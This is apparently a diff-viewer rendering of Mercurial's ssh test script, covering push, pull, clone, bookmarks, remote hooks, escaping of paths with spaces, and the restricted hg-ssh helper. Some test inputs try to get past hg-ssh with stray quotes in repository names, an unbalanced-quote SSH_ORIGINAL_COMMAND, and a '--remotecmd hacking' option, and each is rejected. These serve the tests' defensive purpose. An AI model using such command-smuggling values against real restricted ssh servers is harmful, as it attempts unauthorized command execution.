224 $ cd ../local
225 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
225 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote namespaces
226 bookmarks
226 bookmarks
227 namespaces
227 namespaces
228 phases
228 phases
229 $ hg book foo -r 0
229 $ hg book foo -r 0
230 $ hg out -B
230 $ hg out -B
231 comparing with ssh://user@dummy/remote
231 comparing with ssh://user@dummy/remote
232 searching for changed bookmarks
232 searching for changed bookmarks
233 foo 1160648e36ce
233 foo 1160648e36ce
234 $ hg push -B foo
234 $ hg push -B foo
235 pushing to ssh://user@dummy/remote
235 pushing to ssh://user@dummy/remote
236 searching for changes
236 searching for changes
237 no changes found
237 no changes found
238 exporting bookmark foo
238 exporting bookmark foo
239 [1]
239 [1]
240 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
240 $ hg debugpushkey --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote bookmarks
241 foo 1160648e36cec0054048a7edc4110c6f84fde594
241 foo 1160648e36cec0054048a7edc4110c6f84fde594
242 $ hg book -f foo
242 $ hg book -f foo
243 $ hg push --traceback
243 $ hg push --traceback
244 pushing to ssh://user@dummy/remote
244 pushing to ssh://user@dummy/remote
245 searching for changes
245 searching for changes
246 no changes found
246 no changes found
247 updating bookmark foo
247 updating bookmark foo
248 [1]
248 [1]
249 $ hg book -d foo
249 $ hg book -d foo
250 $ hg in -B
250 $ hg in -B
251 comparing with ssh://user@dummy/remote
251 comparing with ssh://user@dummy/remote
252 searching for changed bookmarks
252 searching for changed bookmarks
253 foo a28a9d1a809c
253 foo a28a9d1a809c
254 $ hg book -f -r 0 foo
254 $ hg book -f -r 0 foo
255 $ hg pull -B foo
255 $ hg pull -B foo
256 pulling from ssh://user@dummy/remote
256 pulling from ssh://user@dummy/remote
257 no changes found
257 no changes found
258 updating bookmark foo
258 updating bookmark foo
259 $ hg book -d foo
259 $ hg book -d foo
260 $ hg push -B foo
260 $ hg push -B foo
261 pushing to ssh://user@dummy/remote
261 pushing to ssh://user@dummy/remote
262 searching for changes
262 searching for changes
263 no changes found
263 no changes found
264 deleting remote bookmark foo
264 deleting remote bookmark foo
265 [1]
265 [1]
266
266
267 a bad, evil hook that prints to stdout
267 a bad, evil hook that prints to stdout
268
268
269 $ cat <<EOF > $TESTTMP/badhook
269 $ cat <<EOF > $TESTTMP/badhook
270 > import sys
270 > import sys
271 > sys.stdout.write("KABOOM\n")
271 > sys.stdout.write("KABOOM\n")
272 > EOF
272 > EOF
273
273
274 $ echo '[hooks]' >> ../remote/.hg/hgrc
274 $ echo '[hooks]' >> ../remote/.hg/hgrc
275 $ echo "changegroup.stdout = \"$PYTHON\" $TESTTMP/badhook" >> ../remote/.hg/hgrc
275 $ echo "changegroup.stdout = \"$PYTHON\" $TESTTMP/badhook" >> ../remote/.hg/hgrc
276 $ echo r > r
276 $ echo r > r
277 $ hg ci -A -m z r
277 $ hg ci -A -m z r
278
278
279 push should succeed even though it has an unexpected response
279 push should succeed even though it has an unexpected response
280
280
281 $ hg push
281 $ hg push
282 pushing to ssh://user@dummy/remote
282 pushing to ssh://user@dummy/remote
283 searching for changes
283 searching for changes
284 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
284 remote has heads on branch 'default' that are not known locally: 6c0482d977a3
285 remote: adding changesets
285 remote: adding changesets
286 remote: adding manifests
286 remote: adding manifests
287 remote: adding file changes
287 remote: adding file changes
288 remote: added 1 changesets with 1 changes to 1 files
288 remote: added 1 changesets with 1 changes to 1 files
289 remote: KABOOM
289 remote: KABOOM
290 $ hg -R ../remote heads
290 $ hg -R ../remote heads
291 changeset: 5:1383141674ec
291 changeset: 5:1383141674ec
292 tag: tip
292 tag: tip
293 parent: 3:a28a9d1a809c
293 parent: 3:a28a9d1a809c
294 user: test
294 user: test
295 date: Thu Jan 01 00:00:00 1970 +0000
295 date: Thu Jan 01 00:00:00 1970 +0000
296 summary: z
296 summary: z
297
297
298 changeset: 4:6c0482d977a3
298 changeset: 4:6c0482d977a3
299 parent: 0:1160648e36ce
299 parent: 0:1160648e36ce
300 user: test
300 user: test
301 date: Thu Jan 01 00:00:00 1970 +0000
301 date: Thu Jan 01 00:00:00 1970 +0000
302 summary: z
302 summary: z
303
303
304
304
305 clone bookmarks
305 clone bookmarks
306
306
307 $ hg -R ../remote bookmark test
307 $ hg -R ../remote bookmark test
308 $ hg -R ../remote bookmarks
308 $ hg -R ../remote bookmarks
309 * test 4:6c0482d977a3
309 * test 4:6c0482d977a3
310 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
310 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local-bookmarks
311 requesting all changes
311 requesting all changes
312 adding changesets
312 adding changesets
313 adding manifests
313 adding manifests
314 adding file changes
314 adding file changes
315 added 6 changesets with 5 changes to 4 files (+1 heads)
315 added 6 changesets with 5 changes to 4 files (+1 heads)
316 updating to branch default
316 updating to branch default
317 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
318 $ hg -R local-bookmarks bookmarks
318 $ hg -R local-bookmarks bookmarks
319 test 4:6c0482d977a3
319 test 4:6c0482d977a3
320
320
321 passwords in ssh urls are not supported
321 passwords in ssh urls are not supported
322 (we use a glob here because different Python versions give different
322 (we use a glob here because different Python versions give different
323 results here)
323 results here)
324
324
325 $ hg push ssh://user:erroneouspwd@dummy/remote
325 $ hg push ssh://user:erroneouspwd@dummy/remote
326 pushing to ssh://user:*@dummy/remote (glob)
326 pushing to ssh://user:*@dummy/remote (glob)
327 abort: password in URL not supported!
327 abort: password in URL not supported!
328 [255]
328 [255]
329
329
330 $ cd ..
330 $ cd ..
331
331
332 hide outer repo
332 hide outer repo
333 $ hg init
333 $ hg init
334
334
335 Test remote paths with spaces (issue2983):
335 Test remote paths with spaces (issue2983):
336
336
337 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
337 $ hg init --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
338 $ touch "$TESTTMP/a repo/test"
338 $ touch "$TESTTMP/a repo/test"
339 $ hg -R 'a repo' commit -A -m "test"
339 $ hg -R 'a repo' commit -A -m "test"
340 adding test
340 adding test
341 $ hg -R 'a repo' tag tag
341 $ hg -R 'a repo' tag tag
342 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
342 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
343 73649e48688a
343 73649e48688a
344
344
345 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
345 $ hg id --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo#noNoNO"
346 abort: unknown revision 'noNoNO'!
346 abort: unknown revision 'noNoNO'!
347 [255]
347 [255]
348
348
349 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
349 Test (non-)escaping of remote paths with spaces when cloning (issue3145):
350
350
351 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
351 $ hg clone --ssh "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/a repo"
352 destination directory: a repo
352 destination directory: a repo
353 abort: destination 'a repo' is not empty
353 abort: destination 'a repo' is not empty
354 [255]
354 [255]
355
355
356 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
356 Test hg-ssh using a helper script that will restore PYTHONPATH (which might
357 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
357 have been cleared by a hg.exe wrapper) and invoke hg-ssh with the right
358 parameters:
358 parameters:
359
359
360 $ cat > ssh.sh << EOF
360 $ cat > ssh.sh << EOF
361 > userhost="\$1"
361 > userhost="\$1"
362 > SSH_ORIGINAL_COMMAND="\$2"
362 > SSH_ORIGINAL_COMMAND="\$2"
363 > export SSH_ORIGINAL_COMMAND
363 > export SSH_ORIGINAL_COMMAND
364 > PYTHONPATH="$PYTHONPATH"
364 > PYTHONPATH="$PYTHONPATH"
365 > export PYTHONPATH
365 > export PYTHONPATH
366 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
366 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" "$TESTTMP/a repo"
367 > EOF
367 > EOF
368
368
369 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
369 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a repo"
370 73649e48688a
370 73649e48688a
371
371
372 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
372 $ hg id --ssh "sh ssh.sh" "ssh://user@dummy/a'repo"
373 remote: Illegal repository "$TESTTMP/a'repo" (glob)
373 remote: Illegal repository "$TESTTMP/a'repo" (glob)
374 abort: no suitable response from remote hg!
374 abort: no suitable response from remote hg!
375 [255]
375 [255]
376
376
377 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
377 $ hg id --ssh "sh ssh.sh" --remotecmd hacking "ssh://user@dummy/a'repo"
378 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
378 remote: Illegal command "hacking -R 'a'\''repo' serve --stdio"
379 abort: no suitable response from remote hg!
379 abort: no suitable response from remote hg!
380 [255]
380 [255]
381
381
382 $ SSH_ORIGINAL_COMMAND="'hg' serve -R 'a'repo' --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
382 $ SSH_ORIGINAL_COMMAND="'hg' serve -R 'a'repo' --stdio" $PYTHON "$TESTDIR/../contrib/hg-ssh"
383 Illegal command "'hg' serve -R 'a'repo' --stdio": No closing quotation
383 Illegal command "'hg' serve -R 'a'repo' --stdio": No closing quotation
384 [255]
384 [255]
385
385
386 Test hg-ssh in read-only mode:
386 Test hg-ssh in read-only mode:
387
387
388 $ cat > ssh.sh << EOF
388 $ cat > ssh.sh << EOF
389 > userhost="\$1"
389 > userhost="\$1"
390 > SSH_ORIGINAL_COMMAND="\$2"
390 > SSH_ORIGINAL_COMMAND="\$2"
391 > export SSH_ORIGINAL_COMMAND
391 > export SSH_ORIGINAL_COMMAND
392 > PYTHONPATH="$PYTHONPATH"
392 > PYTHONPATH="$PYTHONPATH"
393 > export PYTHONPATH
393 > export PYTHONPATH
394 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
394 > "$PYTHON" "$TESTDIR/../contrib/hg-ssh" --read-only "$TESTTMP/remote"
395 > EOF
395 > EOF
396
396
397 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
397 $ hg clone --ssh "sh ssh.sh" "ssh://user@dummy/$TESTTMP/remote" read-only-local
398 requesting all changes
398 requesting all changes
399 adding changesets
399 adding changesets
400 adding manifests
400 adding manifests
401 adding file changes
401 adding file changes
402 added 6 changesets with 5 changes to 4 files (+1 heads)
402 added 6 changesets with 5 changes to 4 files (+1 heads)
403 updating to branch default
403 updating to branch default
404 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
404 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
405
405
406 $ cd read-only-local
406 $ cd read-only-local
407 $ echo "baz" > bar
407 $ echo "baz" > bar
408 $ hg ci -A -m "unpushable commit" bar
408 $ hg ci -A -m "unpushable commit" bar
409 $ hg push --ssh "sh ../ssh.sh"
409 $ hg push --ssh "sh ../ssh.sh"
410 pushing to ssh://user@dummy/*/remote (glob)
410 pushing to ssh://user@dummy/*/remote (glob)
411 searching for changes
411 searching for changes
412 remote: Permission denied
412 remote: Permission denied
413 remote: abort: pretxnopen.hg-ssh hook failed
413 remote: abort: pretxnopen.hg-ssh hook failed
414 remote: Permission denied
414 remote: Permission denied
415 remote: pushkey-abort: prepushkey.hg-ssh hook failed
415 remote: pushkey-abort: prepushkey.hg-ssh hook failed
416 updating 6c0482d977a3 to public failed!
416 updating 6c0482d977a3 to public failed!
417 [1]
417 [1]
418
418
419 $ cd ..
419 $ cd ..
420
420
421 stderr from remote commands should be printed before stdout from local code (issue4336)
421 stderr from remote commands should be printed before stdout from local code (issue4336)
422
422
423 $ hg clone remote stderr-ordering
423 $ hg clone remote stderr-ordering
424 updating to branch default
424 updating to branch default
425 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
425 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
426 $ cd stderr-ordering
426 $ cd stderr-ordering
427 $ cat >> localwrite.py << EOF
427 $ cat >> localwrite.py << EOF
428 > from mercurial import exchange, extensions
428 > from mercurial import exchange, extensions
429 >
429 >
430 > def wrappedpush(orig, repo, *args, **kwargs):
430 > def wrappedpush(orig, repo, *args, **kwargs):
431 > res = orig(repo, *args, **kwargs)
431 > res = orig(repo, *args, **kwargs)
432 > repo.ui.write('local stdout\n')
432 > repo.ui.write('local stdout\n')
433 > return res
433 > return res
434 >
434 >
435 > def extsetup(ui):
435 > def extsetup(ui):
436 > extensions.wrapfunction(exchange, 'push', wrappedpush)
436 > extensions.wrapfunction(exchange, 'push', wrappedpush)
437 > EOF
437 > EOF
438
438
439 $ cat >> .hg/hgrc << EOF
439 $ cat >> .hg/hgrc << EOF
440 > [paths]
440 > [paths]
441 > default-push = ssh://user@dummy/remote
441 > default-push = ssh://user@dummy/remote
442 > [ui]
442 > [ui]
443 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
443 > ssh = "$PYTHON" "$TESTDIR/dummyssh"
444 > [extensions]
444 > [extensions]
445 > localwrite = localwrite.py
445 > localwrite = localwrite.py
446 > EOF
446 > EOF
447
447
448 $ echo localwrite > foo
448 $ echo localwrite > foo
449 $ hg commit -m 'testing localwrite'
449 $ hg commit -m 'testing localwrite'
450 $ hg push
450 $ hg push
451 pushing to ssh://user@dummy/remote
451 pushing to ssh://user@dummy/remote
452 searching for changes
452 searching for changes
453 remote: adding changesets
453 remote: adding changesets
454 remote: adding manifests
454 remote: adding manifests
455 remote: adding file changes
455 remote: adding file changes
456 remote: added 1 changesets with 1 changes to 1 files
456 remote: added 1 changesets with 1 changes to 1 files
457 remote: KABOOM
457 remote: KABOOM
458 local stdout
458 local stdout
459
459
460 debug output
460 debug output
461
461
462 $ hg pull --debug ssh://user@dummy/remote
462 $ hg pull --debug ssh://user@dummy/remote
463 pulling from ssh://user@dummy/remote
463 pulling from ssh://user@dummy/remote
464 running .* ".*/dummyssh" user@dummy ('|")hg -R remote serve --stdio('|") (re)
464 running .* ".*/dummyssh" ['"]user@dummy['"] ('|")hg -R remote serve --stdio('|") (re)
465 sending hello command
465 sending hello command
466 sending between command
466 sending between command
467 remote: 355
467 remote: 355
468 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
468 remote: capabilities: lookup changegroupsubset branchmap pushkey known getbundle unbundlehash batch streamreqs=generaldelta,revlogv1 bundle2=HG20%0Achangegroup%3D01%2C02%0Adigests%3Dmd5%2Csha1%2Csha512%0Aerror%3Dabort%2Cunsupportedcontent%2Cpushraced%2Cpushkey%0Ahgtagsfnodes%0Alistkeys%0Apushkey%0Aremote-changegroup%3Dhttp%2Chttps unbundle=HG10GZ,HG10BZ,HG10UN
469 remote: 1
469 remote: 1
470 preparing listkeys for "bookmarks"
470 preparing listkeys for "bookmarks"
471 sending listkeys command
471 sending listkeys command
472 received listkey for "bookmarks": 45 bytes
472 received listkey for "bookmarks": 45 bytes
473 query 1; heads
473 query 1; heads
474 sending batch command
474 sending batch command
475 searching for changes
475 searching for changes
476 all remote heads known locally
476 all remote heads known locally
477 no changes found
477 no changes found
478 preparing listkeys for "phases"
478 preparing listkeys for "phases"
479 sending listkeys command
479 sending listkeys command
480 received listkey for "phases": 15 bytes
480 received listkey for "phases": 15 bytes
481 checking for updated bookmarks
481 checking for updated bookmarks
482
482
483 $ cd ..
483 $ cd ..
484
484
485 $ cat dummylog
485 $ cat dummylog
486 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
486 Got arguments 1:user@dummy 2:hg -R nonexistent serve --stdio
487 Got arguments 1:user@dummy 2:hg -R /$TESTTMP/nonexistent serve --stdio
487 Got arguments 1:user@dummy 2:hg -R /$TESTTMP/nonexistent serve --stdio
488 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
488 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
489 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
489 Got arguments 1:user@dummy 2:hg -R local-stream serve --stdio
490 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
490 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
491 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
491 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
492 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
492 Got arguments 1:user@dummy 2:hg -R doesnotexist serve --stdio
493 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
493 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
494 Got arguments 1:user@dummy 2:hg -R local serve --stdio
494 Got arguments 1:user@dummy 2:hg -R local serve --stdio
495 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
495 Got arguments 1:user@dummy 2:hg -R $TESTTMP/local serve --stdio
496 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
496 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
497 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
497 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_NODE_LAST=a28a9d1a809cab7d4e2fde4bee738a9ede948b60 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
498 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
498 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
499 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
499 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
500 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
500 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
501 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
501 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
502 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
502 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
503 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
503 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
504 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
504 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
505 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
506 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
506 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
507 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
507 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=1383141674ec756a6056f6a9097618482fe0f4a6 HG_NODE_LAST=1383141674ec756a6056f6a9097618482fe0f4a6 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
508 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
509 Got arguments 1:user@dummy 2:hg init 'a repo'
509 Got arguments 1:user@dummy 2:hg init 'a repo'
510 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
510 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
511 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
511 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
512 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
512 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
513 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
513 Got arguments 1:user@dummy 2:hg -R 'a repo' serve --stdio
514 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
514 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
515 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
515 changegroup-in-remote hook: HG_HOOKNAME=changegroup HG_HOOKTYPE=changegroup HG_NODE=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_NODE_LAST=65c38f4125f9602c8db4af56530cc221d93b8ef8 HG_SOURCE=serve HG_TXNID=TXN:$ID$ HG_URL=remote:ssh:$LOCALIP
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
516 Got arguments 1:user@dummy 2:hg -R remote serve --stdio
517
517
518 remote hook failure is attributed to remote
518 remote hook failure is attributed to remote
519
519
520 $ cat > $TESTTMP/failhook << EOF
520 $ cat > $TESTTMP/failhook << EOF
521 > def hook(ui, repo, **kwargs):
521 > def hook(ui, repo, **kwargs):
522 > ui.write('hook failure!\n')
522 > ui.write('hook failure!\n')
523 > ui.flush()
523 > ui.flush()
524 > return 1
524 > return 1
525 > EOF
525 > EOF
526
526
527 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
527 $ echo "pretxnchangegroup.fail = python:$TESTTMP/failhook:hook" >> remote/.hg/hgrc
528
528
529 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
529 $ hg -q --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" clone ssh://user@dummy/remote hookout
530 $ cd hookout
530 $ cd hookout
531 $ touch hookfailure
531 $ touch hookfailure
532 $ hg -q commit -A -m 'remote hook failure'
532 $ hg -q commit -A -m 'remote hook failure'
533 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
533 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" push
534 pushing to ssh://user@dummy/remote
534 pushing to ssh://user@dummy/remote
535 searching for changes
535 searching for changes
536 remote: adding changesets
536 remote: adding changesets
537 remote: adding manifests
537 remote: adding manifests
538 remote: adding file changes
538 remote: adding file changes
539 remote: added 1 changesets with 1 changes to 1 files
539 remote: added 1 changesets with 1 changes to 1 files
540 remote: hook failure!
540 remote: hook failure!
541 remote: transaction abort!
541 remote: transaction abort!
542 remote: rollback completed
542 remote: rollback completed
543 remote: abort: pretxnchangegroup.fail hook failed
543 remote: abort: pretxnchangegroup.fail hook failed
544 [1]
544 [1]
545
545
546 abort during pull is properly reported as such
546 abort during pull is properly reported as such
547
547
548 $ echo morefoo >> ../remote/foo
548 $ echo morefoo >> ../remote/foo
549 $ hg -R ../remote commit --message "more foo to be pulled"
549 $ hg -R ../remote commit --message "more foo to be pulled"
550 $ cat >> ../remote/.hg/hgrc << EOF
550 $ cat >> ../remote/.hg/hgrc << EOF
551 > [extensions]
551 > [extensions]
552 > crash = ${TESTDIR}/crashgetbundler.py
552 > crash = ${TESTDIR}/crashgetbundler.py
553 > EOF
553 > EOF
554 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
554 $ hg --config ui.ssh="\"$PYTHON\" $TESTDIR/dummyssh" pull
555 pulling from ssh://user@dummy/remote
555 pulling from ssh://user@dummy/remote
556 searching for changes
556 searching for changes
557 adding changesets
557 adding changesets
558 remote: abort: this is an exercise
558 remote: abort: this is an exercise
559 transaction abort!
559 transaction abort!
560 rollback completed
560 rollback completed
561 abort: stream ended unexpectedly (got 0 bytes, expected 4)
561 abort: stream ended unexpectedly (got 0 bytes, expected 4)
562 [255]
562 [255]
@@ -1,577 +1,577 b''
1
1
2 This test tries to exercise the ssh functionality with a dummy script
2 This test tries to exercise the ssh functionality with a dummy script
3
3
4 $ cat <<EOF >> $HGRCPATH
4 $ cat <<EOF >> $HGRCPATH
5 > [format]
5 > [format]
6 > usegeneraldelta=yes
6 > usegeneraldelta=yes
7 > EOF
7 > EOF
8
8
9 creating 'remote' repo
9 creating 'remote' repo
10
10
11 $ hg init remote
11 $ hg init remote
12 $ cd remote
12 $ cd remote
13 $ echo this > foo
13 $ echo this > foo
14 $ echo this > fooO
14 $ echo this > fooO
15 $ hg ci -A -m "init" foo fooO
15 $ hg ci -A -m "init" foo fooO
16
16
17 insert a closed branch (issue4428)
17 insert a closed branch (issue4428)
18
18
19 $ hg up null
19 $ hg up null
20 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
20 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
21 $ hg branch closed
21 $ hg branch closed
22 marked working directory as branch closed
22 marked working directory as branch closed
23 (branches are permanent and global, did you want a bookmark?)
23 (branches are permanent and global, did you want a bookmark?)
24 $ hg ci -mc0
24 $ hg ci -mc0
25 $ hg ci --close-branch -mc1
25 $ hg ci --close-branch -mc1
26 $ hg up -q default
26 $ hg up -q default
27
27
28 configure for serving
28 configure for serving
29
29
30 $ cat <<EOF > .hg/hgrc
30 $ cat <<EOF > .hg/hgrc
31 > [server]
31 > [server]
32 > uncompressed = True
32 > uncompressed = True
33 >
33 >
34 > [hooks]
34 > [hooks]
35 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
35 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
36 > EOF
36 > EOF
37 $ cd ..
37 $ cd ..
38
38
39 repo not found error
39 repo not found error
40
40
41 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
41 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
42 remote: abort: repository nonexistent not found!
42 remote: abort: repository nonexistent not found!
43 abort: no suitable response from remote hg!
43 abort: no suitable response from remote hg!
44 [255]
44 [255]
45
45
46 non-existent absolute path
46 non-existent absolute path
47
47
48 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/`pwd`/nonexistent local
48 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/`pwd`/nonexistent local
49 remote: abort: repository $TESTTMP/nonexistent not found!
49 remote: abort: repository $TESTTMP/nonexistent not found!
50 abort: no suitable response from remote hg!
50 abort: no suitable response from remote hg!
51 [255]
51 [255]
52
52
53 clone remote via stream
53 clone remote via stream
54
54
55 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
55 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
56 streaming all changes
56 streaming all changes
57 4 files to transfer, 602 bytes of data
57 4 files to transfer, 602 bytes of data
58 transferred 602 bytes in * seconds (*) (glob)
58 transferred 602 bytes in * seconds (*) (glob)
59 searching for changes
59 searching for changes
60 no changes found
60 no changes found
61 updating to branch default
61 updating to branch default
62 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
62 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
63 $ cd local-stream
63 $ cd local-stream
64 $ hg verify
64 $ hg verify
65 checking changesets
65 checking changesets
66 checking manifests
66 checking manifests
67 crosschecking files in changesets and manifests
67 crosschecking files in changesets and manifests
68 checking files
68 checking files
69 2 files, 3 changesets, 2 total revisions
69 2 files, 3 changesets, 2 total revisions
70 $ hg branches
70 $ hg branches
71 default 0:1160648e36ce
71 default 0:1160648e36ce
72 $ cd ..
72 $ cd ..
73
73
74 clone bookmarks via stream
74 clone bookmarks via stream
75
75
76 $ hg -R local-stream book mybook
76 $ hg -R local-stream book mybook
77 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
77 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
78 streaming all changes
78 streaming all changes
79 4 files to transfer, 602 bytes of data
79 4 files to transfer, 602 bytes of data
80 transferred 602 bytes in * seconds (*) (glob)
80 transferred 602 bytes in * seconds (*) (glob)
81 searching for changes
81 searching for changes
82 no changes found
82 no changes found
83 updating to branch default
83 updating to branch default
84 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
